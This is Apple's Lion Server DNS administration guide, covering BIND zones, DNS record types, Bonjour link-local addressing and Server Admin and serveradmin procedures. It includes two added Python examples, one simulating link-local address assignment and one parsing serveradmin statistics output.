Lion Server uses Berkeley Internet Name Domain (BIND) v9.4.1 for its implementation of DNS protocols. BIND is an open-source implementation and is used by most name servers on the Internet.

DNS zones
Zones are the basic organizational unit of DNS. Zones contain records and are defined by how they acquire those records and how they respond to DNS requests. There are three basic zones:
- Primary
- Secondary
- Forward
Other kinds of zones are not covered here.

Primary zones
A primary zone has the master copy of the zone's records and provides authoritative answers to lookup requests.

Secondary zones
A secondary zone is a copy of a primary zone and is stored on a secondary name server. It has the following characteristics:
- Each secondary zone has a list of primary servers that it contacts for updates to records in the primary zone. Secondaries must be configured to request the copy of the primary zone data.
- Secondary zones use zone transfers to get copies of the primary zone data.
- Secondary name servers can take lookup requests like primary servers.
By using several secondary zones linked to one primary, you can distribute DNS query loads across several computers and make sure lookup requests are answered if the primary name server is down. Secondary zones also have a refresh interval. This interval determines how often the secondary zone checks for changes from the primary zone. You can change the zone refresh interval by using the BIND configuration file. For more information, see www.isc.org/sw/bind.

Forward zones
A forward zone directs lookup requests for that zone to other DNS servers. Forward zones do not perform zone transfers. Often, forward zone servers are used to provide DNS service to a private network behind a firewall. In this case, the DNS server must have access to the Internet and a DNS server outside the firewall. Forward zones also cache responses to queries they pass on. This can improve the performance of lookups by clients that use the forward zone. Server Admin does not support creation or modification of a forward zone. To create a forward zone, you must configure BIND manually at the command line. For details, see the BIND documentation.

DNS machine records


Each zone contains a number of records. These records are requested when a computer translates a domain name (like www.example.com) to an IP number. Web browsers, mail clients, and other network applications rely on zone records to contact the correct server. Primary zone records are queried by others across the Internet so they can connect to your network services. Several types of DNS records are available for configuration by Server Admin:

DNS record              Description
Address (A)             Stores the IP address associated with a domain name.
Canonical Name (CNAME)  Stores an alias in connection with the real name of a server. For example, mail.apple.com might be an alias for a computer with a real canonical name of MailSrv473.apple.com.
Mail Exchanger (MX)     Stores the domain name of the computer used for mail in a zone.
Name Server (NS)        Stores the authoritative name server for a zone.
Pointer (PTR)           Stores the domain name of an IP address (reverse lookup).
Text (TXT)              Stores a text string as a response to a DNS query.
Service (SRV)           Stores information about the services a computer provides.
Hardware Info (HINFO)   Stores information about a computer's hardware and software.

Lion Server simplifies the creation of these records by focusing on the computer being added to the zone, rather than the records. When you add a computer record to a zone, Lion Server creates the zone records that resolve to a computer address. With this model, you can focus on what your computers do in your domain, rather than which record types apply to their functions. If you need access to other kinds of records, you must edit the BIND configuration files manually. For details, see www.isc.org/sw/bind.

Bonjour and link-local addressing


With Bonjour, you can share nearly anything, including files, media, printers, and other devices, in innovative and easier ways. It simplifies traditional network-based activities like file sharing and printing by providing dynamic discoverability of file servers and Bonjour-enabled network printers.

Bonjour begins by simplifying the otherwise complex process of configuring devices for a network. To communicate with other devices using IP, a device needs special information like an IP address, a subnet mask, DNS addresses, a DNS name, and preconfigured search paths. Understanding these cryptic details and performing the subsequent configuration can be daunting for the average user.

When a new computer or device is added to a network without a means of autoconfiguration, like a DHCP server, Bonjour configures the device using a technique called link-local addressing. (If a DHCP server is available, Bonjour uses the assigned IP address.) With link-local addressing, the computer randomly selects an IP address from a defined range of addresses set aside by the Internet Assigned Numbers Authority (IANA) for link-local addressing and assigns that address to itself. Addresses are in the range 169.254.xxx.xxx. The device then sends a message over the network to determine whether another device is using the address. If the address is in use, the device randomly selects addresses until it finds one that is available. When the device has assigned itself an IP address, it can send and receive IP traffic on the network.

Mac OS X Server v10.5 or later supports Wide-Area Bonjour browsing that allows computers and devices that support Bonjour to communicate across LANs, subnets, and the Internet.
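The following is an added example, not Apple's Bonjour code, that simulates the link-local self-assignment just described: draw a random 169.254.x.x address, probe the link for a conflict, and draw again if the address is taken. The probe is a stand-in for the ARP probe a real host sends; here it is simply a set of addresses already claimed on the link, constructed for the demonstration. The attempt limit is an assumption of this simulation.

```python
"""Constructed example: link-local (169.254.0.0/16) address self-assignment with conflict retry."""
import ipaddress
import random

LINK_LOCAL = ipaddress.ip_network("169.254.0.0/16")
MAX_ATTEMPTS = 10  # assumption for this simulation: give up after this many conflicts


def seeded_rng(seed):
    """A deterministic random source, so a run can be reproduced."""
    return random.Random(seed)


def candidate_address(rng):
    """Pick a random host address from 169.254.1.0 to 169.254.254.255.

    RFC 3927 reserves the first and last /24 of the block (169.254.0.x and
    169.254.255.x), so the third octet is drawn from 1 to 254.
    """
    return ipaddress.ip_address(f"169.254.{rng.randint(1, 254)}.{rng.randint(0, 255)}")


def self_assign(in_use, rng=None, max_attempts=MAX_ATTEMPTS):
    """Return (address, attempts) for the first candidate that no other device claims.

    `in_use` holds the IPv4Address values that would answer the conflict probe.
    Raises RuntimeError when every attempt collides.
    """
    rng = rng or random.Random()
    for attempt in range(1, max_attempts + 1):
        candidate = candidate_address(rng)
        assert candidate in LINK_LOCAL  # every draw stays inside the IANA link-local range
        if candidate not in in_use:    # the "is anyone using this?" probe
            return candidate, attempt
    raise RuntimeError("no free link-local address found")


def all_link_local_hosts():
    """Every usable address on the link, for simulating a fully occupied link."""
    return set(LINK_LOCAL.hosts())


if __name__ == "__main__":
    # Constructed link state: two addresses already claimed by other devices.
    taken = {ipaddress.ip_address("169.254.10.20"), ipaddress.ip_address("169.254.77.1")}
    print(self_assign(taken, seeded_rng(1)))
```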

Before you set up DNS service


Because the issues involved with DNS administration are complex and numerous, do not set up DNS service on your network unless you're an experienced DNS administrator. A good source of information about DNS is DNS and BIND, 5th edition, by Paul Albitz and Cricket Liu (O'Reilly and Associates, 2006).

Note: Apple can help you locate a network consultant to implement DNS service. You can contact Apple Professional Services and Apple Consultants Network on the web at consultants.apple.com.

Consider creating a mail alias, such as hostmaster, that receives mail and delivers it to the person that runs the DNS server at your site. This permits users and other DNS administrators to contact you regarding DNS problems.

Set up at least one primary and one secondary name server. That way, if the primary name server shuts down, the secondary name server can continue to provide service. A secondary server gets its information from the primary server by periodically copying all domain information from the primary server.

After a name server is provided with the name/address pair of a host in another domain (outside the domain it serves), the information is cached, ensuring that IP addresses for recently resolved names are stored for later use. DNS information is usually cached on your name server for a set time, referred to as a time-to-live (TTL) value. When the TTL value for a domain name/IP address pair has expired, the entry is deleted from the name server's cache and your server requests the information as needed.

Overview of DNS setup


If you're using an external DNS name server and you entered its IP address in the Gateway Setup Assistant, you don't need to do anything else. If you're setting up your own DNS server, you must do the following.

Register your domain name
Domain name registration is managed by IANA. IANA registration makes sure that domain names are unique across the Internet. (For more information, see http://www.iana.org.) If you don't register your domain name, your network can't communicate over the Internet.

After you register a domain name, you can create subdomains as long as you set up a DNS server on your network to track the subdomain names and IP addresses. For example, if you register the domain name example.com, you could create subdomains such as host1.example.com, mail.example.com, or www.example.com. A server in a subdomain could be named primary.www.example.com or backup.www.example.com. The DNS server for example.com tracks information for its subdomains, such as host (computer) names, static IP addresses, aliases, and mail exchangers. If your ISP handles your DNS service, you must inform them of changes you make to your domain name, including added subdomains.

The range of IP addresses used with a domain must be clearly defined before setup. These addresses are used exclusively for one specific domain, never by another domain or subdomain. Coordinate the range of addresses with your network administrator or ISP.

Learn and plan
If you're new to DNS, learn and understand DNS concepts, tools, and features of Lion Server and BIND. See Find more DNS information. When you're ready, plan your DNS service. Consider the following questions:
- Do you need a local DNS server? Does your ISP provide DNS service? Can you use multicast DNS names instead?
- How many servers do you need? How many additional servers do you need for backup DNS purposes? For example, should you designate a second or third computer for DNS service backup?
- What is your security strategy to deal with unauthorized use?
- How often should you schedule periodic inspections or tests of DNS records to verify data integrity?
- How many services or devices (such as intranet websites or network printers) need a name?

There are two ways to configure DNS service on a Mac server:
- Use Server Admin. This is the recommended method.
- Edit the BIND configuration file. BIND is the set of programs used by Lion Server that implements DNS. One of those programs is the name daemon, or named. To set up and configure BIND, you must change the configuration file and the zone file. The configuration file is /etc/named.conf. The zone file name is based on the name of the zone. For example, the zone file for example.com is /var/named/example.com.zone.

If you edit named.conf to configure BIND, don't change the inet settings of the controls statement. Otherwise, Server Admin can't retrieve status information for DNS. The inet settings should look like this:

controls {
    inet 127.0.0.1 port 54 allow {any;} keys { "rndc-key"; };
};

Important: In Mac OS X Server v10.6 or later, the configuration and zone files used by Server Admin have changed. If you edit named.conf and zone files manually from Terminal, the information is used by DNS. However, the information does not appear in the DNS zones pane of Server Admin. Also, changes made in Server Admin are not made to named.conf.

Turn DNS service on
Before configuring DNS service, turn on DNS. See Turn on DNS service.

Create a DNS zone and add machine records
Use Server Admin to set up DNS zones. See Configure DNS service primary zone settings. After adding a primary zone, Server Admin creates a name server record with the same name as the Source of Authority (SOA). For each zone you create, Mac OS X Server creates a reverse lookup zone. Reverse lookup zones translate IP addresses to domain names. (Compare with normal lookups, which translate domain names to IP addresses.) Use Server Admin to add records to your zone. Create an Address record for every computer or device (such as a printer or file server) that has a static IP address and needs a name. Various DNS zone records are created from DNS machine entries.

Configure secondary zones
If necessary, use Server Admin to configure secondary zones. See Configure DNS service secondary zone settings.

Configure Bonjour
Use Server Admin to configure Bonjour settings. See Configure DNS service Bonjour settings.

Configure logging
Use Server Admin to specify the information that gets logged by DNS service and to specify the location of the log file. See Change DNS log detail levels.

(Optional) Set up a mail exchange (MX) record
If you provide mail service over the Internet, set up an MX record for your server. See Configure DNS for Mail service.

Configure your firewall
Configure your firewall to make sure DNS service is protected from attack and accessible to your clients. See Defend against server mining.

Start DNS service
Lion Server includes a simple interface for starting and stopping DNS service. See Start DNS service.

Network infrastructure services

DNS

Upgrade your DNS configuration


Lion Server manages DNS entries more efficiently than Mac OS X Server v10.5. To take advantage of this, DNS records created on Mac OS X Server v10.5 must be upgraded. After you upgrade to Lion Server and turn on DNS in Server Admin, the upgrade pane appears the first time you click DNS. (The upgrade pane appears only if you upgraded to Lion Server from a version prior to Mac OS X Server v10.5. It does not appear if Lion Server was newly installed.) The upgrade pane has two options:
- Don't Upgrade: If you choose not to upgrade your configuration, you cannot use Server Admin to automatically configure DNS. You can manually configure DNS using the /etc/named.conf file for DNS configuration and the /var/named folder for zone configuration.
- Upgrade: The Upgrade option converts DNS file records and then allows access to the DNS panes of Server Admin. When upgrading, backup files are created. If the files must be restored, they can be restored manually. Backup files are saved in the same folders where the original files are located.

Set up DNS

Turn on DNS service


Before you can configure DNS settings, turn on DNS service in Server Admin.

1. Open Server Admin and connect to the server.
2. Click Settings.
3. Click Services.
4. Select the DNS checkbox.
5. Click Save.

Configure DNS service primary zone settings


Use Server Admin to create a local DNS zone file and add records to it.

Important: In Mac OS X Server v10.6 and Mac OS X Lion Server, the configuration and zone files used by Server Admin have changed. If you edit the named.conf and zone files manually from Terminal, the information is used by DNS. However, the information does not appear in the DNS zones pane of Server Admin. Also, changes made in Server Admin are not made to the named.conf file. It is recommended that you use Server Admin.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Zones.
5. Click Add Zone, then choose Add Primary Zone (Master).
6. Select the new zone.
7. In the Primary Zone Name field, enter the zone name. This is the domain name of the primary server.
8. Enter the mail address of the zone's administrator.
9. Select Allows zone transfer to permit secondary zones to get copies of the primary zone data.
10. Add name servers for this zone by clicking the Add button (+) and entering the name in the Name Servers field.
11. Add mail exchangers for this zone by clicking the Add button (+) and entering the name in the Mail Exchangers field. This field is the basis for the computer's MX record.
12. In the Priority field, specify a mail server precedence number. Delivering mail servers try to deliver mail to lower-numbered mail servers first.
13. Click Expiration and enter the number of hours for each setting:
    - Enter the amount of time the zone is valid. This is the zone's time to live (TTL) value. It determines how long query response information can remain cached in remote DNS systems before requerying the authoritative server.
    - Enter the interval of time that the secondary zones should refresh from the primary zone.
    - Enter the interval of time between each retry if the refresh of the secondary zone fails.
    - Enter the amount of time after refreshing before the zone data expires.
14. Click Add Record, then choose Add Alias (CNAME). To see a list of records for a zone, click the triangle at the left of the zone.
15. Select newAlias listed under the primary zone. You can add as many aliases as you want.
16. In the Alias Name field, enter the alternate name for your computer. To use the fully qualified name for the Alias, select the Fully Qualified checkbox and enter the fully qualified domain name. This field is the basis for CNAME records of the computer. Reverse lookup Pointer records are created for the computer.
17. In the Destination field, enter the computer name you are creating the alias for. To use the fully qualified name for the Destination, select the Fully Qualified checkbox and enter the fully qualified domain name.
18. Click Add Record, then choose Add Machines (A).
19. Under the primary zone, select newMachine, then enter the following machine information:
    - In the Machine Name field, enter the hostname of the computer. This field is the basis for the A record of the computer. Reverse lookup Pointer records are created for the computer.
    - Click the Add button (+), then enter the IP address of the computer.
    - Enter information about the hardware and software of the computer in the relevant text boxes. These are the basis for the HINFO record of the computer.
    - Enter comments about the computer in the Comments text box. This field is the basis for the TXT record of the computer. You can store almost any text string in the comments text box, up to 255 ASCII characters. For example, you can include the physical location of the computer (Upstairs server closet B), the computer's owner (John's Computer), or any other information about the computer.
20. Click Add Record, then choose Add Service (SRV). The DNS SRV record is an entry that informs client computers that a service is on a domain. These records help computers locate a service on a domain. For more information, see Add a service record to a DNS zone.
21. Under the primary zone, select a service type and enter the service information.
22. Click Save.

Configure DNS service secondary zone settings


A secondary zone is a copy of a primary zone stored on a secondary name server. Each secondary zone keeps a list of primary servers it contacts for updates to records in the primary zone. Secondary zones must be configured to request the copy of primary zone data. Secondary zones use zone transfers to get copies of primary zone data. Secondary name servers can take lookup requests like primary servers.

1. Make sure the primary server is correctly configured and that zone transfers are enabled on the primary server; then open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Zones.
5. Click Add Zone, then choose Add Secondary Zone (Slave).
6. Select the new zone.
7. In the Secondary Zone Name field, enter a zone name. The zone name is the same as the primary zone defined on the primary name server.
8. Below the Primary DNS Servers list, click the Add button (+).
9. Enter the IP addresses for each primary server in this secondary zone.
10. Click Save.

Configure DNS service Bonjour settings


With Bonjour, you can easily connect a computer or other device to an existing wired or wireless Ethernet network, or you can create instant networks of multiple devices without additional network configuration. If your computers or devices support Bonjour, they broadcast and discover services from other computers or devices using Bonjour. You can quickly and easily network computers and devices that support Bonjour. Bonjour requires no configuration for computers or devices on your local subnet. Devices on the same subnet that support Bonjour and have it turned on find each other. However, to provide Bonjour browsing across subnets or on the Internet, you must set up a dedicated Bonjour browse domain that allows Bonjour-supported devices to locate services from anywhere on the Internet. Using Server Admin you can designate any domain you set up in DNS as the domain for Bonjour browsing. You can then add SRV records to the Bonjour browsing domain for each service type. These services appear on computers that have the Bonjour browsing domain entered as a search domain in Network Preferences. You can add the Bonjour browsing domain to the search domain of each computer manually or through DHCP. For mobile clients, enter the search domain manually so they have Bonjour browsing access from anywhere. For more information about adding SRV records, see Add a service record to a DNS zone.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Bonjour.
5. Select the Enable automatic client Bonjour browsing for domain checkbox and enter the Fully Qualified Domain Name (FQDN) of the domain used for Bonjour browsing (for example, bonjour.company.com). This sets a default Bonjour browsing domain for primary zones.
6. Click Save.

Configure DNS service settings


You use the Settings pane in DNS to set the detail level of the DNS service log. You might want a highly detailed log for debugging or a less detailed log that only shows critical warnings. You also set where recursive queries are accepted from; the DNS server fully answers such queries (or returns an error). If the query cannot be answered locally, it is forwarded to the IP addresses you add in the Forwarder IP Addresses list.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Settings.
5. From the Log Level pop-up menu, choose the detail level as follows:
    - Choose Critical to record only critical errors, such as hardware errors.
    - Choose Error to record errors, not including warning messages.
    - Choose Warning to record warnings and errors.
    - Choose Notice to record only important messages, warnings, and errors.
    - Choose Information to record most messages.
    - Choose Debug to record all messages.
    The log location is /Library/Logs/named.log.
6. Below the Accept recursive queries from the following networks list, click the Add button (+) to add networks that recursive queries are accepted from, then enter the network address in the list.
7. Below the Forwarder IP Addresses list, click the Add button (+) to add the servers that queries the server cannot answer get forwarded to, then enter the address in the list.
8. Click Save.

Use serveradmin to view DNS service settings


You can use serveradmin to view DNS service settings.

To view a setting:
    $ sudo serveradmin settings dns:setting
To view a group of settings:
    $ sudo serveradmin settings dns:zone:_array_id:localhost:*
Enter as much of the name as you want, stopping at a colon (:), and then enter an asterisk (*) as a wildcard for the remaining parts of the name.
To view all service configuration settings:
    $ sudo serveradmin settings dns
To modify your server's DNS configuration, use serveradmin. However, it is more straightforward to work with DNS and BIND using the standard tools and techniques described in the many books on the subject. (For an example, see DNS and BIND by Paul Albitz and Cricket Liu.)

For information about serveradmin, see its man page.

Start DNS service


Use Server Admin to start DNS service. Remember to restart DNS service when you make changes to DNS service in Server Admin.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Start DNS (below the Servers list).

The service can take a few seconds to start.

Use serveradmin to start DNS service


You can start DNS service using serveradmin.

To start the service:
    $ sudo serveradmin start dns
For information about serveradmin, see its man page.

Manage DNS

Check DNS service status


You can use Server Admin to check the status of DNS service.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Overview to see whether the service is running, when it was started, and the number of zones allocated.
5. Click Log to review the service log. Use the Filter field above the log to search for specific entries.

Use serveradmin to check DNS status


You can use serveradmin to view DNS service status.

To see summary status of the service:
    $ sudo serveradmin status dns
To see detailed status of the service:
    $ sudo serveradmin fullstatus dns

For information about serveradmin, see its man page.

View DNS service logs


DNS service creates entries in the system log for error and alert messages. The log file is named.log. You can filter the log to narrow the number of viewable log entries and make it easier to find those you want to see.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Log and use the Filter field above the log to search for specific entries.

Use serveradmin to view DNS logs


To view the latest entries in a log:
    $ tail log-file
To display the log path:
    $ sudo serveradmin command dns:command = getLogPaths
The default log path is /Library/Logs/named.log.

For information about serveradmin, see its man page.

Change DNS log detail levels


You can change the detail level of the DNS service log. You might want a highly detailed log for debugging or a less detailed log that only shows critical warnings.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Settings.
5. Choose the detail level from the Log Level pop-up menu as follows:
    - Choose Critical to record only critical errors, such as hardware errors.
    - Choose Error to record errors, not including warning messages.
    - Choose Warning to record warnings and errors.
    - Choose Notice to record only important messages, warnings, and errors.
    - Choose Information to record most messages.
    - Choose Debug to record all messages.
6. Click Save.

View DNS service statistics


To view a summary of the DNS service workload, use the serveradmin getStatistics command.

Enter the following from the command line in Terminal:
    $ sudo serveradmin command dns:command = getStatistics
The computer responds with output similar to the following:

    dns:queriesArray:_array_index:0:name = "NS_QUERIES"
    dns:queriesArray:_array_index:0:value = -1
    dns:queriesArray:_array_index:1:name = "A_QUERIES"
    dns:queriesArray:_array_index:1:value = -1
    dns:queriesArray:_array_index:2:name = "CNAME_QUERIES"
    dns:queriesArray:_array_index:2:value = -1
    dns:queriesArray:_array_index:3:name = "PTR_QUERIES"
    dns:queriesArray:_array_index:3:value = -1
    dns:queriesArray:_array_index:4:name = "MX_QUERIES"
    dns:queriesArray:_array_index:4:value = -1
    dns:queriesArray:_array_index:5:name = "SOA_QUERIES"
    dns:queriesArray:_array_index:5:value = -1
    dns:queriesArray:_array_index:6:name = "TXT_QUERIES"
    dns:queriesArray:_array_index:6:value = -1
    dns:nxdomain = 0
    dns:nxrrset = 0
    dns:reloadedTime = ""
    dns:success = 0
    dns:failure = 0
    dns:recursion = 0
    dns:startedTime = "2003-09-10 11:24:03 -0700"
    dns:referral = 0

For information about serveradmin, see its man page.
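The key = value lines that serveradmin prints, both for the settings queries described under Use serveradmin to view DNS service settings and for getStatistics, are easy to turn into structured data for monitoring. The parser and summary below are an added example, not part of Lion Server or this manual; the sample output is constructed to match the format shown above, with made-up counter values.

```python
"""Parse serveradmin's key = value output (as printed by `serveradmin settings dns`
and `serveradmin command dns:command = getStatistics`) into nested Python data,
then summarise the query counters. Added example, not Apple's code."""
import re

# Constructed sample in the getStatistics format shown on this page.
# A counter of -1 means "not collected", as in the manual's own output.
SAMPLE_STATS = """\
dns:queriesArray:_array_index:0:name = "NS_QUERIES"
dns:queriesArray:_array_index:0:value = 12
dns:queriesArray:_array_index:1:name = "A_QUERIES"
dns:queriesArray:_array_index:1:value = 4310
dns:queriesArray:_array_index:2:name = "CNAME_QUERIES"
dns:queriesArray:_array_index:2:value = -1
dns:nxdomain = 870
dns:nxrrset = 3
dns:reloadedTime = ""
dns:success = 4200
dns:failure = 19
dns:recursion = 4100
dns:startedTime = "2003-09-10 11:24:03 -0700"
dns:referral = 0
"""

LINE_RE = re.compile(r'^(?P<key>\S+)\s*=\s*(?P<val>.*)$')


def parse_value(raw):
    """Quoted strings lose their quotes, integers become int, anything else stays text."""
    raw = raw.strip()
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return raw[1:-1]
    try:
        return int(raw)
    except ValueError:
        return raw


def key_path(key):
    """'dns:queriesArray:_array_index:0:name' -> ['dns', 'queriesArray', 0, 'name'].
    _array_index:N selects a list element; _array_id:NAME selects a dict entry."""
    tokens, path, i = key.split(':'), [], 0
    while i < len(tokens):
        if tokens[i] == '_array_index':
            path.append(int(tokens[i + 1]))
            i += 2
        elif tokens[i] == '_array_id':
            path.append(tokens[i + 1])
            i += 2
        else:
            path.append(tokens[i])
            i += 1
    return path


def _assign(node, path, value):
    """Create intermediate dicts/lists along path and store value at the end."""
    for key, nxt in zip(path, path[1:] + [None]):
        child = [] if isinstance(nxt, int) else ({} if nxt is not None else value)
        if isinstance(node, list):
            while len(node) <= key:
                node.append(None)
            if node[key] is None or nxt is None:
                node[key] = child
        elif key not in node or nxt is None:
            node[key] = child
        node = node[key]


def parse_serveradmin(text):
    root = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            _assign(root, key_path(m.group('key')), parse_value(m.group('val')))
    return root


def query_counts(stats):
    """Per-type counters, dropping entries the server reported as -1 (not collected)."""
    return {e['name']: e['value'] for e in stats['dns']['queriesArray']
            if e and e['value'] >= 0}


def nxdomain_ratio(stats):
    """Share of completed queries that ended in NXDOMAIN. A jump above the usual
    baseline is worth a look: typically a misconfigured client, or name probing."""
    d = stats['dns']
    total = d['success'] + d['failure'] + d['nxdomain'] + d['nxrrset']
    return d['nxdomain'] / total if total else 0.0


if __name__ == '__main__':
    parsed = parse_serveradmin(SAMPLE_STATS)
    print(query_counts(parsed), round(nxdomain_ratio(parsed), 3))
```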

Stop DNS service


Use Server Admin to stop DNS service.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Stop DNS (below the Servers list).
5. Click Stop Now.

Use serveradmin to stop DNS service


You can use serveradmin to stop DNS service.

To stop the service:
    $ sudo serveradmin stop dns
For information about serveradmin, see its man page.

Enable or disable DNS zone transfers


In DNS, zone data is replicated among authoritative DNS servers by means of zone transfers. Secondary DNS servers (secondaries) use zone transfers to acquire their data from primary DNS servers (primaries). You must enable zone transfers to use secondaries.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Zones.
5. Select the primary zone to change.
6. Click General.
7. Select or deselect Allows zone transfer to permit secondary zones to get copies of the primary zone data.
8. Click Save.

Enable DNS recursion


Recursion fully resolves domain names into IP addresses. Applications depend on the DNS server to perform this function. Other DNS servers that query your DNS servers don't need to perform the recursion. To prevent malicious users from changing the primary zone's records (referred to as cache poisoning) and to prevent unauthorized use of the server for DNS service, you can restrict recursion. However, if you restrict your private network from recursion, users can't use your DNS service to look up names outside of your zones. Disable recursion only if:
- No clients are using this DNS server for name resolution.
- No servers are using it for forwarding.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Settings.
5. Below the Accept recursive queries from the following networks list, click the Add button (+).
6. Enter the IP addresses for the servers that DNS will accept recursive queries from. You can also enter IP address ranges.
7. Click Save.

If you enable recursion, consider disabling it for external IP addresses but enabling it for LAN IP addresses by editing the BIND named.conf file. However, edits you make to named.conf do not show up in the DNS section of Server Admin. To completely disable recursion, remove all entries from the network list. For more information about BIND, see www.isc.org/sw/bind.

Manage DNS zones

Add a primary zone


Use Server Admin to add a primary zone to your DNS server.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Zones.
5. Click Add Zone, then choose Add Primary Zone (Master).
6. Select the new zone.
7. In the Primary Zone Name field, enter the zone name. This is the fully qualified domain name of the primary server.
8. Enter the mail address of the zone's administrator.
9. Select Allows zone transfer to permit secondary zones to get copies of the primary zone data.
10. Add nameservers for this zone by clicking the Add button (+) and entering the name in the Nameservers field.
11. Add mail exchangers for this zone by clicking the Add button (+) and entering the name in the Mail Exchangers field. This field is the basis for the computer's MX record.
12. In the Priority field, specify a mail server precedence number. Delivering mail servers try to deliver mail to lower-numbered mail servers first.
13. Click Expiration and enter the number of hours for each setting:
    - Enter the amount of time the zone is valid. This is the zone's time to live (TTL) setting. It determines how long query response information can remain cached in remote DNS systems before requerying the authoritative server.
    - Enter the interval of time that the secondary zones should refresh from the primary zone.
    - Enter the interval of time between each retry if the refresh of the secondary zone fails.
    - Enter the amount of time after refreshing before the zone data expires.
14. Click Save.

Add a secondary zone


Use Server Admin to add a secondary zone to your DNS server. Perform the following steps on the secondary server.

1. Make sure the primary server is correctly configured and that zone transfers are enabled on the primary server.
2. On the secondary server, open Server Admin and connect to the secondary server.
3. Click the triangle at the left of the server. The list of services appears.
4. From the expanded Servers list, select DNS.
5. Click Zones.
6. Click Add Zone, then click Add Secondary Zone (Slave).
7. Select the new zone.
8. In the Secondary Zone Name field, enter a zone name. The zone name is the same as the primary zone defined on the primary name server.
9. Below the Primary Zone addresses list, click the Add button (+).
10. Enter the IP addresses for each primary server in the secondary zone.
11. Click Save.

Set forwarder IP addresses


If a DNS server cannot resolve a DNS query locally, it can use a forwarder to handle the query. The DNS server forwards the request to another DNS server that can respond to the DNS query. This can be used across separate subnets and networks. Use Server Admin to add forwarder IP addresses.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Settings.
5. Below the Forwarder IP Addresses list, click the Add button (+).
6. Enter the IP addresses for the DNS servers that will receive forwarded unresolved DNS queries.
7. Click Save.

Change a zone
Use Server Admin to change zone settings. You might need to change the administrator mail address or domain name of a zone.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Zones.
5. Select the zone to change.
6. Change the zone information as needed.
7. Click Save.

Delete a zone
When you delete a zone, all records associated with it are deleted.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Zones.
5. Select the zone to delete.
6. Below the Zones list, click Remove.
7. Click Save.

Import a BIND zone file


You might already have a BIND zone file from a DNS server of another platform. If so, instead of entering the information in Server Admin manually, you can use the BIND zone file with your Mac server. Using an existing zone file requires:
- Root access permissions to the BIND configuration file (/etc/named.conf)
- The working zone directory (/var/named/)
- A basic knowledge of BIND and the Terminal application
Otherwise, use the Server Admin DNS tools.

Important: In Lion Server, if you edit named.conf and zone files manually from Terminal, the information is used by DNS. However, the information does not appear in the DNS zones pane of Server Admin. Also, changes made in Server Admin are not made to named.conf. It is recommended that you use Server Admin.

1. Verify that you have root privileges.
2. Add the zone directive to the BIND configuration file, /etc/named.conf. For example, for zone xyz.com described in zone file db.xyz.com in the working zone folder /var/named/, the zone directive might look like this:

    zone "xyz.com" IN {           // Forward lookup zone for xyz.com
        type master;              // It's a primary zone
        file "db.xyz.com";        // Zone info stored in /var/named/db.xyz.com
        allow-update { none; };
    };

3. Confirm that the zone file is added to the /var/named/ working zone folder.
4. Restart DNS service using Server Admin.

For information about serveradmin, see its man page.

Manage DNS records

Add an alias record to a DNS zone


You must add records for each computer the DNS primary zone has responsibility for. Do not add records for computers the zone doesn't control. An alias record or canonical name (CNAME) record is used to create aliases that point to other names. If you want this computer to have more than one name, add alias records to the zone.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Zones.
5. Select the zone this record is to be added to.
6. Click Add Record, then choose Add Alias (CNAME). This adds the alias record to the zone.
7. Select newAlias listed under the primary zone, then enter the alias information. In the Alias Name field, enter the alternate name for your computer. To use the fully qualified name for the Alias, select the Fully Qualified checkbox and enter the fully qualified domain name. This field is the basis for CNAME records of the computer. Reverse lookup Pointer records are created for the computer.
8. In the Destination field, enter the computer name you are creating the alias for. To use the fully qualified name for the Destination, select the Fully Qualified checkbox and enter the fully qualified domain name.
9. Click Save. Add as many aliases as you want by adding additional alias records.

Add a machine record to a DNS zone


You must add records for each computer the DNS primary zone has responsibility for. Do not add records for computers the zone doesn't control. A machine record or address (A) record is used to associate a domain name with an IP address. Therefore, there can be only one machine for each IP address because there can't be duplicate IP addresses in a zone.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Zones.
5. Select the zone this record is to be added to.
6. Click Add Record, then choose Add Machine (A). This adds the machine record to the zone.
7. Select newMachine listed under the zone, then enter the following machine information:
    - In the Machine Name field, enter the hostname of the computer. This field is the basis for the A record of the computer. Reverse lookup Pointer records are created for the computer.
    - Click the Add button (+), then enter the IP address of the computer.
    - Enter information about the hardware and software of the computer in the relevant text boxes. These are the basis for the HINFO record of the computer.
    - Enter comments about the computer in the Comment text box. This field is the basis for the TXT record of the computer. You can store up to 255 ASCII characters in the comments text box. You can include the physical location of the computer (for example, Upstairs server closet B), the computer's owner (for example, John's Computer), or other information about the computer.
8. Click Save.

